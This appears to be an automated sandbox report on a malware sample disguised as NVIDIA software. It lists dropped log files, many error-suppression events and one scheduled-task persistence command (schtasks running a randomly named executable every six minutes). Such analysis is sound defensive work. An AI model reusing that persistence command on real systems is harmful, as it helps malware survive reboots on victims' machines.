                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\VAeASPIF.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\snUoPbCy.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\NBjcEgcI.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\DSPMVDWa.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\ukwwlbRt.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\xYhnoKfH.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\XwgSVREI.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\OOMCloya.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\DaiMBcDs.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\gzqzblNZ.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\AOEnQqnj.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\hxRHxlcT.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\XOysNJXm.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\pAbpDGmk.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\TxJtcnQc.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\JOqdsLLu.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\BlhnJSvN.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\HbFMikPW.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\TMLKnwYz.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\JesvDTTS.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\AAjFTaDk.logJump to dropped file

                                  Boot Survival

                                  barindex
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "hBoBqOIwjXsCbkOMEKwZh" /sc MINUTE /mo 6 /tr "'C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe'" /f
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
